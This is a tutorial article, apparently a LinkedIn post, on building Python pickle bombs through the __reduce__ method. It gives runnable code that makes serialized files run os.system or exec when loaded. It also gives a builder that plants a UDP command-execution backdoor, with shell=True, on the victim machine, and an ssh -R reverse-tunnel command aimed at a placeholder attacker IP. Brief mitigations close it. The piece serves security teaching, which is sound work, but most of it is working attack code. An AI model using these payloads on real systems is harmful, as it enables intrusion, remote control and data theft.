Python Deserialization Attack: How to Build a Pickle Bomb
This article will introduce an old and classic unsecured Python data serialization feature (the pickle library) and demonstrates how a red team attacker can exploit it to create a malicious binary or text data file that executes remote code or commands upon deserialization. The following attack flow diagram illustrates this process:
We will follow 3 steps with the program code to show how Deserialization Attacks Work:
Important: All the scripts provided are intended for cybersecurity research and training purposes only. Do not use them to attack real-world systems.
Introduction
Deserialization is the process of converting data from a serialized format back into its original data structure. A deserialization attack occurs when an application deserializes untrusted or maliciously crafted data, leading to potential security vulnerabilities. These attacks can result in various forms of exploitation, including arbitrary code execution, data corruption, and denial of service. The vulnerability arises because the deserialization process often assumes that the incoming data is well-formed and trustworthy. There are several Common Vulnerabilities and Exploits (CVEs) related the Python pickle Deserialization Vulnerabilities:
Introduction of Python Data Serialization
In Python, data serialization often involves converting data into formats like JSON, YAML, or XML for storage and retrieval. These formats are widely used due to their readability and interoperability. However, they can be limited when handling complex data structures, such as nested dictionaries with bytes data or built-in objects. Consider the following example:
# An example data structure that cannot be converted to JSON, YAML, or XML format.
from collections import OrderedDict
data = OrderedDict({
'Timestamp': '2023-04-05 16:00:00',
'IoTData': {
'IP': '172.23.155.209',
'Port': 3001,
'value': [1.2, 1.3, 1.4],
'RptPeer': {
'Hub1': 1.2,
'Hub2': 1.3
},
'CfgSet': set(['CT100', 'COM3', 3]) # set data is not support by json
}
})
For such complex data objects, formats like JSON, YAML, or XML are not suitable. In these cases, the pickle library provides a convenient way to serialize and deserialize data. The pickle module can convert complex Python objects into a byte stream (serialization) and then convert the byte stream back into the original objects (deserialization).
import pickle
# Serialize the data to bytes
serialized_data = pickle.dumps(data)
# Deserialize the bytes back to the original data
deserialized_data = pickle.loads(serialized_data)
Using pickle.dumps() allows you to serialize the data into bytes, making it easy to save to a file or transfer over a network. The pickle.loads() function can then be used to deserialize the bytes back into the original data structure. The object can be dump and load are shown below:
This capability is particularly useful for storing or transmitting complex Python objects that are not compatible with simpler serialization formats.
Introduction of Python Deserialization Vulnerabilities
While using the Python pickle module to serialize and deserialize data is convenient, but it is insecure when handling untrusted data. The official Python documentation highlights this risk:
The pickle module can serialize and deserialize Python objects, but it has the capability to execute arbitrary code during deserialization. This feature can be exploited by attackers to run malicious code on the target system. A simple way to create a pickle bomb involves using an object with a custom __reduce__() method as shown in the pickle doc:
The __reduce__() function can return an executable function along with related parameters. When the data is deserialized, the function will be executed. Here is an example of a simple serialized data loader that can load both binary and text format data:
# A normal pickle serialized data file load program (version v0.0.2)
import pickle
import base64
while True:
choice = input("Input load serialized data file format([1] byte file, [2] txt file):")
if choice == '1':
orignalData = None
with open('data.pkl', 'rb') as fh:
orignalData = pickle.load(fh)
print(orignalData)
elif choice == '2':
dataStr = None
with open('data.txt', 'r') as fh:
dataStr = fh.read()
orignalData = pickle.loads(base64.b64decode(dataStr))
print(orignalData)
else:
print("Exit....")
exit()
To build a simple Python pickle bomb, we can over write the __reduce__() method to return the os.system function with a command string. This way, when the data loader reads the data file, it will execute the command:
import os
import pickle
import base64
# a simple picle bomb to run command
class PickleCmd:
def __reduce__(self):
cmd = ('uname -a')
return os.system, (cmd,)
obj = PickleCmd()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
with open('data.pkl', 'wb') as handle:
pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)
dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
fh.write(dataStr)
When we run this script, it will create two data files: a binary data file (`data.pkl`) and a text data file (`data.txt`). Using the loader to read these files will execute the command, demonstrating how the system information can be retrieved:
With the ability to execute commands, an attacker can integrate harmful actions, such as deleting files or retrieving credential information. This highlights the severe risk of deserializing untrusted data with the pickle module. Always ensure that serialized data is from a trusted source to avoid such vulnerabilities.
Build Python Pickle Boom
In this section, we will build a more complex Python pickle bomb program that allows us to bypass system authorization mechanisms, remotely execute commands on the victim machine, and retrieve the results.
Clarification on Command Execution
Before we proceed, it's important to clarify how commands can be executed within the __reduce__() function. Consider the following modification:
class PickleCmd:
def __reduce__(self):
os.system('date')
os.system('ifconfig')
with open('testfile.txt', 'w') as fh:
fh.write("Test file contents")
cmd = ('uname -a')
return os.system, (cmd,)
If we reload the new pickle bomb, you can see that the additional commands are not executed:
Only the function returned by __reduce__() is executed. To perform more complex tasks, such as running commands on the victim's machine, we can use a reverse shell command. For example:
cmd = ('ssh -R 0.0.0.0:7070:localhost:22 <redTeam hacker\'s IP address>')
However, this method exposes the red team attacker's IP address in the command logs. If we want to run more complex Python programs without exposing this information, we can use the exec() function. The exec() function allows you to execute arbitrary Python code from a string or compiled code input. It is useful for running dynamically generated Python code, though it should be used cautiously due to its potential risks.
领英推荐
Improving the Pickle Bomb Program
Let's improve our pickle bomb program to return the exec function and a piece of Python code in the __reduce__() function:
import pickle
import base64
codeContent="""
with open('testfile.txt', 'w') as fh:
fh.write("Test file contents")
"""
# a simple picle bomb to run command
class PickleCode:
def __reduce__(self):
return exec, (codeContent,)
obj = PickleCode()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
with open('data.pkl', 'wb') as handle:
pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)
dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
fh.write(dataStr)
After loading the data file, you will see that the Python code to create a file is executed:
By leveraging the exec() function, we can execute more complex and dynamic Python code, making the pickle bomb more powerful and versatile for demonstrating security vulnerabilities in the deserialization process. Remember, this information is for educational purposes only and should not be used for malicious activities.
Building a More Complex Python Pickle Bomb
In this section, we will build a more complex Python pickle bomb program. This program will include a UDP server that receives command execution requests from the red team attacker, executes the code, and returns the results to the sender. This method ensures that the red team's IP address is not exposed, even if the bomb is discovered.
Here is the UDP server program:
# A normal UDP server hosted on port 3000 that accepts different UDP client connections,
# executes commands, and sends the results back to the corresponding client (version v0.0.
import socket
import subprocess
BUFFER_SZ = 4096
port = 3000
udpServer = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
udpServer.bind(('0.0.0.0', port))
while True:
data, address = udpServer.recvfrom(BUFFER_SZ)
cmdMsg = data.decode('utf-8')
if cmdMsg == '': continue
if cmdMsg == 'exit': exit()
result = 'Command not found!'
try:
result = subprocess.check_output(cmdMsg, shell=True).decode()
except Exception as err:
result = str(err)
udpServer.sendto(result.encode('utf-8'), address)
Next, we will read this Python program as a string, pass it as a parameter in the pickle bomb object, and create the pickle bomb data file with a simple bomb builder:
# A normal pickle serialized data file create program (version v0.0.2)
import pickle
import base64
# Serilized file:
#fileName = 'flaskWebShellApp.py'
fileName = 'udpCmdServer.py'
dataStr = None
with open(fileName, 'r') as fh:
dataStr = fh.read()
class PickleBomb:
def __reduce__(self):
pass
return exec, (dataStr,)
obj = PickleBomb()
pickledata = pickle.dumps(obj, protocol=pickle.HIGHEST_PROTOCOL)
with open('data.pkl', 'wb') as handle:
pickle.dump(obj, handle, protocol=pickle.HIGHEST_PROTOCOL)
dataStr = base64.b64encode(pickledata).decode('ascii')
with open('data.txt', 'w') as fh:
fh.write(dataStr)
Now, if anyone runs the pickle loader or any program that attempts to load the pickle file, the bomb will be activated:
We can then use a simple UDP client program to connect to the victim's IP address and run commands:
As shown, we can check the folder structure and network information of the victim.
Remark: Since the Python file is passed in as a string, if the script calls a library that is not installed on the victim's machine, it will fail to execute.
Mitigations of Python Deserialization Attack
To avoid the Python Deserialization Attack happen, there are several points we can follow:
1. Avoid Deserialization of Untrusted Data: Do not deserialize data from untrusted sources. Use safer serialization formats such as JSON or XML where possible, as they do not support code execution during deserialization.
2. Validate Input: Implement strict input validation to ensure that only well-formed and expected data is processed.
3. Use Safe Libraries: Prefer libraries and frameworks that are designed with security in mind and that do not support unsafe deserialization.
4. Sandboxing: If deserialization of untrusted data is unavoidable, run the deserialization process in a restricted environment (sandbox) to limit the potential impact.
Conclusion and Reference
Deserialization attacks pose a significant risk, particularly when using insecure libraries like Python's pickle. Understanding the nature of these vulnerabilities and implementing best practices to avoid or mitigate them is crucial for maintaining secure applications.
Reference:
Demo Step and Program execution
For downloading the programs to try the demo, please follow the Program Setup and Program Execution section in this link:
# Created: 2024/07/06
# Version: v0.1.1
# Copyright: Copyright (c) 2024 LiuYuancheng
# License: MIT License
Thanks for spending time to check the article detail, if you have any question and suggestion or find any program bug, please feel free to message me. Many thanks if you can give some comments and share any of the improvement advice so we can make our work better ~
Hardware and OT Security Researcher
8 个月This is a really great, detailed explanation. Thank you for taking the time to write something of this quality, for free. I hope you continue to make more like it, for other serialization exploits etc. ??